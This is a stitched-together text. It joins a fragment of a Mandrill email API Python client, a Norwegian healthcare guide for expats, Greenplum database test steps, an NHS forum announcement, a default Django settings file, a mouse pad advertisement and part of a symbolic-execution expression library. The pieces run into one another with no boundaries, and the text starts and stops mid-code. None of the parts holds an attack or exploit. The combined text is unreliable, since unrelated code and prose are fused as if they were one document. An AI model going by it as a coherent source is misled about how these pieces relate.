error has occurred """ _params = {'domain': domain} return self.master.call('senders/check-domain', _params) def verify_domain(self, domain, mailbox): """Sends a verification email in order to verify ownership of a domain. Domain verification is an optional step to confirm ownership of a domain. Once a domain has been verified in a Mandrill account, other accounts may not have their messages signed by that domain unless they also verify the domain. This prevents other Mandrill accounts from sending mail signed by your domain. Args: domain (string): a domain name at which you can receive email mailbox (string): a mailbox at the domain where the verification email should be sent Returns: struct. information about the verification that was sent:: status (string): "sent" indicates that the verification has been sent, "already_verified" indicates that the domain has already been verified with your account domain (string): the domain name you provided email (string): the email address the verification email was sent to Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain, 'mailbox': mailbox} return self.master.call('senders/verify-domain', _params) def info(self, address): """Return more detailed information about a single sender, including aggregates of recent stats Args: address (string): the email address of the sender Returns: struct. the detailed information on the sender:: address (string): the sender's email address created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format sent (integer): the total number of messages sent by this sender hard_bounces (integer): the total number of hard bounces by messages by this sender soft_bounces (integer): the total number of soft bounces by messages by this sender rejects (integer): the total number of rejected messages by this sender complaints (integer): the total number of spam complaints received for messages by this sender unsubs (integer): the total number of unsubscribe requests received for messages by this sender opens (integer): the total number of times messages by this sender have been opened clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked stats (struct): an aggregate summary of the sender's sending stats:: stats.today (struct): stats for this sender so far today:: stats.today.sent (integer): the number of emails sent for this sender so far today stats.today.hard_bounces (integer): the number of emails hard bounced for this sender so far today stats.today.soft_bounces (integer): the number of emails soft bounced for this sender so far today stats.today.rejects (integer): the number of emails rejected for sending this sender so far today stats.today.complaints (integer): the number of spam complaints for this sender so far today stats.today.unsubs (integer): the number of unsubscribes for this sender so far today stats.today.opens (integer): the number of times emails have been opened for this sender so far today stats.today.unique_opens (integer): the number of unique opens for emails sent for this sender so far today stats.today.clicks (integer): the number of URLs that have been clicked for this sender so far today stats.today.unique_clicks (integer): the number of unique clicks for emails sent for this sender so far today stats.last_7_days (struct): stats for this sender in the last 7 days:: stats.last_7_days.sent (integer): the number of emails sent for this sender in the last 7 days stats.last_7_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 7 days stats.last_7_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 7 days stats.last_7_days.rejects (integer): the number of emails rejected for sending this sender in the last 7 days stats.last_7_days.complaints (integer): the number of spam complaints for this sender in the last 7 days stats.last_7_days.unsubs (integer): the number of unsubscribes for this sender in the last 7 days stats.last_7_days.opens (integer): the number of times emails have been opened for this sender in the last 7 days stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 7 days stats.last_7_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 7 days stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 7 days stats.last_30_days (struct): stats for this sender in the last 30 days:: stats.last_30_days.sent (integer): the number of emails sent for this sender in the last 30 days stats.last_30_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 30 days stats.last_30_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 30 days stats.last_30_days.rejects (integer): the number of emails rejected for sending this sender in the last 30 days stats.last_30_days.complaints (integer): the number of spam complaints for this sender in the last 30 days stats.last_30_days.unsubs (integer): the number of unsubscribes for this sender in the last 30 days stats.last_30_days.opens (integer): the number of times emails have been opened for this sender in the last 30 days stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 30 days stats.last_30_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 30 days stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 30 days stats.last_60_days (struct): stats for this sender in the last 60 days:: stats.last_60_days.sent (integer): the number of emails sent for this sender in the last 60 days stats.last_60_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 60 days stats.last_60_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 60 days stats.last_60_days.rejects (integer): the number of emails rejected for sending this sender in the last 60 days stats.last_60_days.complaints (integer): the number of spam complaints for this sender in the last 60 days stats.last_60_days.unsubs (integer): the number of unsubscribes for this sender in the last 60 days stats.last_60_days.opens (integer): the number of times emails have been opened for this sender in the last 60 days stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 60 days stats.last_60_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 60 days stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 60 days stats.last_90_days (struct): stats for this sender in the last 90 days:: stats.last_90_days.sent (integer): the number of emails sent for this sender in the last 90 days stats.last_90_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 90 days stats.last_90_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 90 days stats.last_90_days.rejects (integer): the number of emails rejected for sending this sender in the last 90 days stats.last_90_days.complaints (integer): the number of spam complaints for this sender in the last 90 days stats.last_90_days.unsubs (integer): the number of unsubscribes for this sender in the last 90 days stats.last_90_days.opens (integer): the number of times emails have been opened for this sender in the last 90 days stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 90 days stats.last_90_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 90 days stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 90 days Raises: UnknownSenderError: The requested sender does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'address': address} return self.master.call('senders/info', _params) def time_series(self, address): """Return the recent history (hourly stats for the last 30 days) for a sender Args: address (string): the email address of the sender Returns: array. the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: UnknownSenderError: The requested sender does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'address': address} return self.master.call('senders/time-series', _params) class Metadata(object): def __init__(self, master): self.master = master def list(self, ): """Get the list of custom metadata fields indexed for the account. Returns: array. the custom metadata fields for the account:: [] (struct): the individual custom metadata field info:: [].name (string): the unique identifier of the metadata field to update [].state (string): the current state of the metadata field, one of "active", "delete", or "index" [].view_template (string): Mustache template to control how the metadata is rendered in your activity log Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('metadata/list', _params) def add(self, name, view_template=None): """Add a new custom metadata field to be indexed for the account. Args: name (string): a unique identifier for the metadata field view_template (string): optional Mustache template to control how the metadata is rendered in your activity log Returns: struct. the information saved about the new metadata field:: name (string): the unique identifier of the metadata field to update state (string): the current state of the metadata field, one of "active", "delete", or "index" view_template (string): Mustache template to control how the metadata is rendered in your activity log Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key MetadataFieldLimitError: Custom metadata field limit reached. Error: A general Mandrill error has occurred """ _params = {'name': name, 'view_template': view_template} return self.master.call('metadata/add', _params) def update(self, name, view_template): """Update an existing custom metadata field. Args: name (string): the unique identifier of the metadata field to update view_template (string): optional Mustache template to control how the metadata is rendered in your activity log Returns: struct. the information for the updated metadata field:: name (string): the unique identifier of the metadata field to update state (string): the current state of the metadata field, one of "active", "delete", or "index" view_template (string): Mustache template to control how the metadata is rendered in your activity log Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMetadataFieldError: The provided metadata field name does not exist. Error: A general Mandrill error has occurred """ _params = {'name': name, 'view_template': view_template} return self.master.call('metadata/update', _params) def delete(self, name): """Delete an existing custom metadata field. Deletion isn't instataneous, and /metadata/list will continue to return the field until the asynchronous deletion process is complete. Args: name (string): the unique identifier of the metadata field to update Returns: struct. the information for the deleted metadata field:: name (string): the unique identifier of the metadata field to update state (string): the current state of the metadata field, one of "active", "delete", or "index" view_template (string): Mustache template to control how the metadata is rendered in your activity log Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMetadataFieldError: The provided metadata field name does not exist. Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('metadata/delete', _params)
About 35% of Norway’s state budget goes into its health and social welfare system hence citizens are assured of financial support during illness, old age and unemployment. The healthcare system in Norway has both public and private medical services. The Norwegian government finances the public health service. There are public medical clinics in communities. Most communities also have first aid stations (legevakt). Residents set up an appointment first with the general practitioner, who will then refer the patient to a specialist. According to Statistics Norway, "the life expectancy is 77 for males and 82 for females. After World War II, tuberculosis and other communicable diseases claimed the most number of lives." If you have an existing health insurance policy before moving, clarify with the medical insurance company that your coverage is valid in Norway, and if emergency costs such as medical evacuation and hospital expenses will be taken care of. Expats can attain health insurance in Norway through their tax deductions to the Norwegian Social Insurance Scheme. As soon as your social security number (fødselnummer) is issued, Norwegian Labor & Welfare (NAV) will send your health card with a letter indicating that you are assigned to a particular general practitioner or doctor for future consultation and treatments. Take note that you must find a new doctor on your own and you may only change doctor twice a year. Public healthcare in Norway is manned by regional health agencies. Medical facilities are of a superior quality, and most doctors can speak English. However, emergency cases in remote areas may be subjected to long travel, especially if the patient has to be transported via ferry across fjords. Most treatments, in-patient care and medication cost nothing except for the non-refundable consultation fee. A specialist will charge a higher amount than a general practitioner, but it is typically within the 100 NOK range. You have to buy your own medicine unless the recommended medication is on a blue prescription (for recurring conditions). However, you only need to pay 36% of the total cost, with a maximum of 360 NOK.
from gppylib.commands.base import Command, ExecutionError, REMOTE, WorkerPool from gppylib.db import dbconn from gppylib.gparray import GpArray from gppylib.test.behave_utils.utils import run_gpcommand, getRows import platform @given('the information of a "{seg}" segment on a remote host is saved') @when('the information of a "{seg}" segment on a remote host is saved') @then('the information of a "{seg}" segment on a remote host is saved') def impl(context, seg): if seg == "mirror": gparray = GpArray.initFromCatalog(dbconn.DbURL()) mirror_segs = [seg for seg in gparray.getDbList() if seg.isSegmentMirror() and seg.getSegmentHostName() != platform.node()] context.remote_mirror_segdbId = mirror_segs[0].getSegmentDbId() context.remote_mirror_segdbname = mirror_segs[0].getSegmentHostName() context.remote_mirror_datadir = mirror_segs[0].getSegmentDataDirectory() @given('user runs the command "{cmd}" with the saved mirror segment option') @when('user runs the command "{cmd}" with the saved mirror segment option') @then('user runs the command "{cmd}" with the saved mirror segment option') def impl(context, cmd): cmdStr = '%s -s %s' % (cmd, int(context.remote_mirror_segdbId)) cmd=Command(name='user command', cmdStr=cmdStr) cmd.run(validateAfter=True) @given('the saved mirror segment process is still running on that host') @when('the saved mirror segment process is still running on that host') @then('the saved mirror segment process is still running on that host') def impl(context): cmd = """ps ux | grep "/bin/postgres \-D %s " | grep -v grep""" % (context.remote_mirror_datadir) cmd=Command(name='user command', cmdStr=cmd, ctxt=REMOTE, remoteHost=context.remote_mirror_segdbname) cmd.run(validateAfter=True) res = cmd.get_results() if not res.stdout.strip(): raise Exception('Mirror segment "%s" not active on "%s"' % (context.remote_mirror_datadir, context.remote_mirror_segdbname)) @given('the saved mirror segment is marked down in config') @when('the saved mirror segment is marked down in config') @then('the saved mirror segment is marked down in config') def impl(context): qry = """select count(*) from gp_segment_configuration where status='d' and hostname='%s' and dbid=%s""" % (context.remote_mirror_segdbname, context.remote_mirror_segdbId) row_count = getRows('template1', qry)[0][0] if row_count != 1: raise Exception('Expected mirror segment %s on host %s to be down, but it is running.' % (context.remote_mirror_datadir, context.remote_mirror_segdbname))
360 Assurance has been running a Quality Assurance Forum for senior management representatives from NHS provider trusts across the East Midlands and South Yorkshire for over 2 years. The forum has been an enormous success and has led to 360 Assurance winning the 2012 HFMA Governance Award and The Benchmarking Institute & The Best Practice Club 2013 Benchmarking Excellence Award. Building on this success we have established a forum specifically aimed at the Non-Executive Directors who sit on NHS Trust Quality Committees (Board Sub-Committees) within the East Midlands and South Yorkshire. The inaugural meeting of the Quality Committee NED Members’ Forum was held on March 11th 2014, at Trent Vineyard Conference Centre, Nottingham. Sir Stephen Moss talked to the Forum about his experiences at Mid Staffordshire NHS Foundation Trust between 2009 and 2012 and what can be learnt about quality assurance systems and processes. Good discussions occurred amongst attendees regarding the quality priorities for 2014-15 and the key risks on the horizon for Quality Committee members to be cognisant of. This was an excellent opportunity for networking and sharing ideas and good practice. If you would like further information about the forum or to book a place at future meetings please contact Elaine Dower (0115 8835313 or elaine.dower@360assurance.nhs.uk).
""" Django settings for jbobau project. Generated by 'django-admin startproject' using Django 1.10.1. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'm#8yqn^1gq&*879+o)e#k2ixg3)_bhv(i@j53g$*ay-tu6p&h%' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'home', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'jbobau.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'jbobau.wsgi.application' # Database # https://docs.djangoproject.com/en/1.10/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.10/howto/static-files/ STATIC_URL = '/static/'
Custom designed personalized mouse pads with your company name or logo makes a great gift and is a great way to keep your company name in front of customers. Personalized mouse pads are a great addition to any office. These mouse pads are a great gift ideal for any occasion. Perfect for fund raisers, team logos, trade show giveaways, and school or club fundraisers. Call for discounts on 5 or more, we are glad to help.
from functools import reduce from ...exceptions import SmtlibError import uuid import re import copy from typing import Union, Type, Optional, Dict, Any class ExpressionException(SmtlibError): """ Expression exception """ pass class Expression: """ Abstract taintable Expression. """ def __init__(self, taint: Union[tuple, frozenset] = ()): if self.__class__ is Expression: raise TypeError super().__init__() self._taint = frozenset(taint) def __repr__(self): return "<{:s} at {:x}{:s}>".format(type(self).__name__, id(self), self.taint and "-T" or "") @property def is_tainted(self): return len(self._taint) != 0 @property def taint(self): return self._taint def issymbolic(value) -> bool: """ Helper to determine whether an object is symbolic (e.g checking if data read from memory is symbolic) :param object value: object to check :return: whether `value` is symbolic :rtype: bool """ return isinstance(value, Expression) def istainted(arg, taint=None): """ Helper to determine whether an object if tainted. :param arg: a value or Expression :param taint: a regular expression matching a taint value (eg. 'IMPORTANT.*'). If None, this function checks for any taint value. """ if not issymbolic(arg): return False if taint is None: return len(arg.taint) != 0 for arg_taint in arg.taint: m = re.match(taint, arg_taint, re.DOTALL | re.IGNORECASE) if m: return True return False def get_taints(arg, taint=None): """ Helper to list an object taints. :param arg: a value or Expression :param taint: a regular expression matching a taint value (eg. 'IMPORTANT.*'). If None, this function checks for any taint value. """ if not issymbolic(arg): return for arg_taint in arg.taint: if taint is not None: m = re.match(taint, arg_taint, re.DOTALL | re.IGNORECASE) if m: yield arg_taint else: yield arg_taint return def taint_with(arg, *taints, value_bits=256, index_bits=256): """ Helper to taint a value. :param arg: a value or Expression :param taint: a regular expression matching a taint value (eg. 'IMPORTANT.*'). If None, this function checks for any taint value. """ tainted_fset = frozenset(tuple(taints)) if not issymbolic(arg): if isinstance(arg, int): arg = BitVecConstant(value_bits, arg) arg._taint = tainted_fset else: raise ValueError("type not supported") else: if isinstance(arg, BitVecVariable): arg = arg + BitVecConstant(value_bits, 0, taint=tainted_fset) else: arg = copy.copy(arg) arg._taint |= tainted_fset return arg class Variable(Expression): def __init__(self, name: str, *args, **kwargs): if self.__class__ is Variable: raise TypeError assert " " not in name super().__init__(*args, **kwargs) self._name = name @property def declaration(self): pass @property def name(self): return self._name def __copy__(self, memo): raise ExpressionException("Copying of Variables is not allowed.") def __deepcopy__(self, memo): raise ExpressionException("Copying of Variables is not allowed.") def __repr__(self): return "<{:s}({:s}) at {:x}>".format(type(self).__name__, self.name, id(self)) class Constant(Expression): def __init__(self, value: Union[bool, int], *args, **kwargs): if self.__class__ is Constant: raise TypeError super().__init__(*args, **kwargs) self._value = value @property def value(self): return self._value class Operation(Expression): def __init__(self, *operands, **kwargs): if self.__class__ is Operation: raise TypeError # assert len(operands) > 0 # assert all(isinstance(x, Expression) for x in operands) self._operands = operands # If taint was not forced by a keyword argument, calculate default if "taint" not in kwargs: kwargs["taint"] = reduce(lambda x, y: x.union(y.taint), operands, frozenset()) super().__init__(**kwargs) @property def operands(self): return self._operands ############################################################################### # Booleans class Bool(Expression): def __init__(self, *operands, **kwargs): super().__init__(*operands, **kwargs) def cast(self, value: Union[int, bool], **kwargs) -> Union["BoolConstant", "Bool"]: if isinstance(value, Bool): return value return BoolConstant(bool(value), **kwargs) def __cmp__(self, *args): raise NotImplementedError("CMP for Bool") def __invert__(self): return BoolNot(self) def __eq__(self, other): return BoolEqual(self, self.cast(other)) def __hash__(self): return object.__hash__(self) def __ne__(self, other): return BoolNot(self == self.cast(other)) def __and__(self, other): return BoolAnd(self, self.cast(other)) def __or__(self, other): return BoolOr(self, self.cast(other)) def __xor__(self, other): return BoolXor(self, self.cast(other)) def __rand__(self, other): return BoolAnd(self.cast(other), self) def __ror__(self, other): return BoolOr(self.cast(other), self) def __rxor__(self, other): return BoolXor(self.cast(other), self) def __bool__(self): raise NotImplementedError("__bool__ for Bool") class BoolVariable(Bool, Variable): def __init__(self, name, *args, **kwargs): super().__init__(name, *args, **kwargs) @property def declaration(self): return f"(declare-fun {self.name} () Bool)" class BoolConstant(Bool, Constant): def __init__(self, value: bool, *args, **kwargs): super().__init__(value, *args, **kwargs) def __bool__(self): return self.value class BoolOperation(Operation, Bool): def __init__(self, *operands, **kwargs): super().__init__(*operands, **kwargs) class BoolNot(BoolOperation): def __init__(self, value, **kwargs): super().__init__(value, **kwargs) class BoolAnd(BoolOperation): def __init__(self, a, b, **kwargs): super().__init__(a, b, **kwargs) class BoolOr(BoolOperation): def __init__(self, a: "Bool", b: "Bool", **kwargs): super().__init__(a, b, **kwargs) class BoolXor(BoolOperation): def __init__(self, a, b, **kwargs): super().__init__(a, b, **kwargs) class BoolITE(BoolOperation): def __init__(self, cond: "Bool", true: "Bool", false: "Bool", **kwargs): super().__init__(cond, true, false, **kwargs) class BitVec(Expression): """ This adds a bitsize to the Expression class """ def __init__(self, size, *operands, **kwargs): super().__init__(*operands, **kwargs) self.size = size @property def mask(self): return (1 << self.size) - 1 @property def signmask(self): return 1 << (self.size - 1) def cast( self, value: Union["BitVec", str, int, bytes], **kwargs ) -> Union["BitVecConstant", "BitVec"]: if isinstance(value, BitVec): assert value.size == self.size return value if isinstance(value, (str, bytes)) and len(value) == 1: value = ord(value) # Try to support not Integral types that can be casted to int if not isinstance(value, int): value = int(value) # FIXME? Assert it fits in the representation return BitVecConstant(self.size, value, **kwargs) def __add__(self, other): return BitVecAdd(self, self.cast(other)) def __sub__(self, other): return BitVecSub(self, self.cast(other)) def __mul__(self, other): return BitVecMul(self, self.cast(other)) def __mod__(self, other): return BitVecMod(self, self.cast(other)) # object.__divmod__(self, other) # object.__pow__(self, other[, modulo]) def __lshift__(self, other): return BitVecShiftLeft(self, self.cast(other)) def __rshift__(self, other): return BitVecShiftRight(self, self.cast(other)) def __and__(self, other): return BitVecAnd(self, self.cast(other)) def __xor__(self, other): return BitVecXor(self, self.cast(other)) def __or__(self, other): return BitVecOr(self, self.cast(other)) # The division operator (/) is implemented by these methods. The # __truediv__() method is used when __future__.division is in effect, # otherwise __div__() is used. If only one of these two methods is # defined, the object will not support division in the alternate context; # TypeError will be raised instead. def __div__(self, other): return BitVecDiv(self, self.cast(other)) def __truediv__(self, other): return BitVecDiv(self, self.cast(other)) def __floordiv__(self, other): return self / other # These methods are called to implement the binary arithmetic operations # (+, # -, *, /, %, divmod(), pow(), **, <<, >>, &, ^, |) with reflected # (swapped) operands. These functions are only called if the left operand # does not support the corresponding operation and the operands are of # different types. [2] For instance, to evaluate the expression x - y, # where y is an instance of a class that has an __rsub__() method, # y.__rsub__(x) is called if x.__sub__(y) returns NotImplemented. def __radd__(self, other): return BitVecAdd(self.cast(other), self) def __rsub__(self, other): return BitVecSub(self.cast(other), self) def __rmul__(self, other): return BitVecMul(self.cast(other), self) def __rmod__(self, other): return BitVecMod(self.cast(other), self) def __rtruediv__(self, other): return BitVecDiv(self.cast(other), self) def __rdiv__(self, other): return BitVecDiv(self.cast(other), self) # object.__rdivmod__(self, other) # object.__rpow__(self, other) def __rlshift__(self, other): return BitVecShiftLeft(self.cast(other), self) def __rrshift__(self, other): return BitVecShiftRight(self.cast(other), self) def __rand__(self, other): return BitVecAnd(self.cast(other), self) def __rxor__(self, other): return BitVecXor(self.cast(other), self) def __ror__(self, other): return BitVecOr(self.cast(other), self) def __invert__(self): return BitVecXor(self, self.cast(self.mask)) # These are the so-called "rich comparison" methods, and are called # for comparison operators in preference to __cmp__() below. The # correspondence between operator symbols and method names is as # follows: # x<y calls x.__lt__(y), # x<=y calls x.__le__(y), # x==y calls x.__eq__(y), # x!=y and x<>y call x.__ne__(y), # x>y calls x.__gt__(y), and # x>=y calls x.__ge__(y). def __lt__(self, other): return LessThan(self, self.cast(other)) def __le__(self, other): return LessOrEqual(self, self.cast(other)) def __eq__(self, other): return BoolEqual(self, self.cast(other)) def __hash__(self): return object.__hash__(self) def __ne__(self, other): return BoolNot(BoolEqual(self, self.cast(other))) def __gt__(self, other): return GreaterThan(self, self.cast(other)) def __ge__(self, other): return GreaterOrEqual(self, self.cast(other)) def __neg__(self): return BitVecNeg(self) # Unsigned comparisons def ugt(self, other): return UnsignedGreaterThan(self, self.cast(other)) def uge(self, other): return UnsignedGreaterOrEqual(self, self.cast(other)) def ult(self, other): return UnsignedLessThan(self, self.cast(other)) def ule(self, other): return UnsignedLessOrEqual(self, self.cast(other)) def udiv(self, other): return BitVecUnsignedDiv(self, self.cast(other)) def rudiv(self, other): return BitVecUnsignedDiv(self.cast(other), self) def sdiv(self, other): return BitVecDiv(self, self.cast(other)) def rsdiv(self, other): return BitVecDiv(self.cast(other), self) def srem(self, other): return BitVecRem(self, self.cast(other)) def rsrem(self, other): return BitVecRem(self.cast(other), self) def urem(self, other): return BitVecUnsignedRem(self, self.cast(other)) def rurem(self, other): return BitVecUnsignedRem(self.cast(other), self) def sar(self, other): return BitVecArithmeticShiftRight(self, self.cast(other)) def sal(self, other): return BitVecArithmeticShiftLeft(self, self.cast(other)) def Bool(self): return self != 0 class BitVecVariable(BitVec, Variable): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @property def declaration(self): return f"(declare-fun {self.name} () (_ BitVec {self.size}))" class BitVecConstant(BitVec, Constant): def __init__(self, size: int, value: int, *args, **kwargs): super().__init__(size, value, *args, **kwargs) def __bool__(self): return self.value != 0 def __eq__(self, other): if self.taint: return super().__eq__(other) return self.value == other def __hash__(self): return super().__hash__() class BitVecOperation(BitVec, Operation): def __init__(self, size, *operands, **kwargs): super().__init__(size, *operands, **kwargs) class BitVecAdd(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecSub(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecMul(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecDiv(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecUnsignedDiv(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecMod(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecRem(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecUnsignedRem(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecShiftLeft(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecShiftRight(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecArithmeticShiftLeft(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecArithmeticShiftRight(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecAnd(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecOr(BitVecOperation): def __init__(self, a: BitVec, b: BitVec, *args, **kwargs): assert a.size == b.size super().__init__(a.size, a, b, *args, **kwargs) class BitVecXor(BitVecOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a.size, a, b, *args, **kwargs) class BitVecNot(BitVecOperation): def __init__(self, a, **kwargs): super().__init__(a.size, a, **kwargs) class BitVecNeg(BitVecOperation): def __init__(self, a, *args, **kwargs): super().__init__(a.size, a, *args, **kwargs) # Comparing two bitvectors results in a Bool class LessThan(BoolOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a, b, *args, **kwargs) class LessOrEqual(BoolOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a, b, *args, **kwargs) class BoolEqual(BoolOperation): def __init__(self, a, b, *args, **kwargs): if isinstance(a, BitVec) or isinstance(b, BitVec): assert a.size == b.size super().__init__(a, b, *args, **kwargs) class GreaterThan(BoolOperation): def __init__(self, a, b, *args, **kwargs): assert a.size == b.size super().__init__(a, b, *args, **kwargs) class GreaterOrEqual(BoolOperation): def __init__(self, a, b, *args, **kwargs): assert a.size == b.size super().__init__(a, b, *args, **kwargs) class UnsignedLessThan(BoolOperation): def __init__(self, a, b, *args, **kwargs): super().__init__(a, b, *args, **kwargs) assert a.size == b.size class UnsignedLessOrEqual(BoolOperation): def __init__(self, a, b, *args, **kwargs): assert a.size == b.size super().__init__(a, b, *args, **kwargs) class UnsignedGreaterThan(BoolOperation): def __init__(self, a, b, *args, **kwargs): assert a.size == b.size super().__init__(a, b, *args, **kwargs) class UnsignedGreaterOrEqual(BoolOperation): def __init__(self, a, b, *args, **kwargs): assert a.size == b.size super(UnsignedGreaterOrEqual, self).__init__(a, b, *args, **kwargs) ############################################################################### # Array BV32 -> BV8 or BV64 -> BV8 class Array(Expression): def __init__( self, index_bits: int, index_max: Optional[int], value_bits: int, *operands, **kwargs ): assert index_bits in (32, 64, 256) assert value_bits in (8, 16, 32, 64, 256) assert index_max is None or index_max >= 0 and index_max < 2 ** index_bits self._index_bits = index_bits self._index_max = index_max self._value_bits = value_bits super().__init__(*operands, **kwargs) assert type(self) is not Array, "Abstract class" def _get_size(self, index): start, stop = self._fix_index(index) size = stop - start if isinstance(size, BitVec): from .visitors import simplify size = simplify(size) else: size = BitVecConstant(self.index_bits, size) assert isinstance(size, BitVecConstant) return size.value def _fix_index(self, index): """ :param slice index: """ stop, start = index.stop, index.start if start is None: start = 0 if stop is None: stop = len(self) return start, stop def cast(self, possible_array): if isinstance(possible_array, bytearray): # FIXME This should be related to a constrainSet arr = ArrayVariable(self.index_bits, len(possible_array), 8) for pos, byte in enumerate(possible_array): arr = arr.store(pos, byte) return arr raise ValueError # cast not implemented def cast_index(self, index: Union[int, "BitVec"]) -> Union["BitVecConstant", "BitVec"]: if isinstance(index, int): # assert self.index_max is None or index >= 0 and index < self.index_max return BitVecConstant(self.index_bits, index) assert index.size == self.index_bits return index def cast_value( self, value: Union["BitVec", str, bytes, int] ) -> Union["BitVecConstant", "BitVec"]: if isinstance(value, BitVec): assert value.size == self.value_bits return value if isinstance(value, (str, bytes)) and len(value) == 1: value = ord(value) if not isinstance(value, int): value = int(value) return BitVecConstant(self.value_bits, value) def __len__(self): if self.index_max is None: raise ExpressionException("Array max index not set") return self.index_max @property def index_bits(self): return self._index_bits @property def value_bits(self): return 